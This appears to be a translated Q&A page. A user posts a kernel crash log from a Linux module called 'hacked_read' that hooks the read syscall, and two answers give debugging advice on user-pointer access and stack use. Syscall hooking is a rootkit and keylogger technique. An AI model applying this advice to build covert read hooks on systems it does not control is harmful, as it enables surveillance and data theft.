Jun 13 16:00:35 localhost kernel: [ 1635.419508] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 13 16:00:35 localhost kernel: [ 1635.419512] CR2: 00007ffd57fa5d6f CR3: 00000002e31fe005 CR4: 00000000003606e0
Jun 13 16:00:35 localhost kernel: [ 1635.419517] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419521] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Jun 13 16:00:35 localhost kernel: [ 1635.419524] Call Trace:
Jun 13 16:00:35 localhost kernel: [ 1635.419538]  do_syscall_64+0x53/0x100
Jun 13 16:00:35 localhost kernel: [ 1635.419548]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
Jun 13 16:00:35 localhost kernel: [ 1635.419555] RIP: 0033:0x7fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419560] Code: fe ff ff 50 48 8d 3d fe cd 09 00 e8 79 04 02 00 66 0f 1f 84 00 00 00 00 00 48 8d 05 99 5f 0d 00 8b 00 85 c0 75 13 31 c0 0f 05 <48> 3d 00 f0 ff ff 77 57 c3 66 0f 1f 44 00 00 41 54 49 89 d4 55 48
Jun 13 16:00:35 localhost kernel: [ 1635.419565] RSP: 002b:00007ffd57fa5d38 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419571] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fa66b7cd761
Jun 13 16:00:35 localhost kernel: [ 1635.419575] RDX: 0000000000000001 RSI: 00007ffd57fa5d6f RDI: 0000000000000000
Jun 13 16:00:35 localhost kernel: [ 1635.419579] RBP: 000056148ad79380 R08: 0000000000000000 R09: 000000000000ffff
Jun 13 16:00:35 localhost kernel: [ 1635.419583] R10: 0000000000000008 R11: 0000000000000246 R12: 00000000000003e8
Jun 13 16:00:35 localhost kernel: [ 1635.419587] R13: 000056148ad93380 R14: 000056148ad3bd20 R15: 00005614890723a6
Jun 13 16:00:35 localhost kernel: [ 1635.419592] Modules linked in: hacked_read(O) ctr ccm nfnetlink_queue xt_REDIRECT nf_log_ipv4 nf_log_common xt_LOG ipt_REJECT nf_reject_ipv4 pktcdvd appletalk psnap llc ax25 xt_NFQUEUE xt_owner xt_tcpudp nft_counter xt_state xt_conntrack nft_compat nft_chain_route_ipv4 nft_chain_nat_ipv4 nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c nf_tables nfnetlink dm_crypt algif_skcipher af_alg dm_mod ext4 mbcache jbd2 crc32c_generic fscrypto ecb fuse arc4 ath10k_pci ath10k_core btusb ath btrtl btbcm snd_hda_codec_hdmi btintel mac80211 intel_rapl bluetooth x86_pkg_temp_thermal intel_powerclamp uvcvideo coretemp snd_hda_codec_realtek cfg80211 kvm_intel videobuf2_vmalloc videobuf2_memops videobuf2_v4l2 videobuf2_common videodev media kvm drbg snd_hda_codec_generic ansi_cprng ecdh_generic
Jun 13 16:00:35 localhost kernel: [ 1635.419690]  crc16 hid_a4tech snd_hda_intel joydev snd_hda_codec irqbypass snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore tpm_crb sg intel_cstate tpm_tis tpm_tis_core mei_me intel_uncore tpm rng_core hid_multitouch mei acer_wmi intel_rapl_perf iTCO_wdt sparse_keymap rfkill serio_raw pcspkr iTCO_vendor_support wmi_bmof idma64 intel_pch_thermal evdev pcc_cpufreq ac acpi_pad battery binfmt_misc ip_tables x_tables autofs4 squashfs zstd_decompress xxhash loop overlay nls_utf8 isofs usbhid sr_mod cdrom sd_mod uas usb_storage hid_generic crct10dif_pclmul crc32_pclmul crc32c_intel ghash_clmulni_intel pcbc nouveau i915 mxm_wmi i2c_algo_bit ahci aesni_intel intel_lpss_pci xhci_pci drm_kms_helper ttm aes_x86_64 libahci xhci_hcd crypto_simd libata cryptd glue_helper alx psmouse i2c_i801 mdio scsi_mod
Jun 13 16:00:35 localhost kernel: [ 1635.419800]  intel_lpss usbcore drm i2c_hid usb_common thermal hid wmi video button
Jun 13 16:00:35 localhost kernel: [ 1635.419817] CR2: 00007ffd57fa5d6f

如果您阅读了我之前的两个问题,会发现它们都与这个 LKM 有关;另外两个问题我已经在这份新代码中解决了。第一个是模块被错误地卸载,导致几个进程继续调用 hacked_read_test 函数,并因为模块已被卸载而以“can not access to this part of memory”错误崩溃。第二个是关于所有 sys_call 的新包装方式,换句话说就是“内核代码的演化/变异”,现在参数通过 regs 传递。这个问题我也已经解决了,因此我的新代码至少应该能在部分机器上运行,可能只能与“较旧”的 CPU 配合使用。

我的问题是:为什么它在 i7-6700HQ 上崩溃?会不会是裸机上有某种不接受我的 asm 操作的“类似 XEN”的虚拟机后门?还是其他原因?

2 个答案:

答案 0 :(得分:1)

        if ( strlen( buf ) > 0 )

您正在通过以下参数调用strlen()

  1. 不在内核地址空间中

  2. 不能指向以空值结尾的字符串

  3. 可能根本不指向映射的内存

不要那样做。使用read()的返回值确定读取了多少数据,并使用copy_from_user()从用户指针复制数据。

答案 1 :(得分:0)

查看日志文件,您可以看到:

  BUG: unable to handle kernel paging request at 00007fffc3497560

此外,指令指针位于:

  RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]

最好的做法是反汇编该函数并找到有问题的指令。

此外,为了让代码能正常工作:

  • 您需要检查返回值
  • 您不应在堆栈上为内核模块分配数组。内核空间的堆栈非常有限。您必须在堆上分配。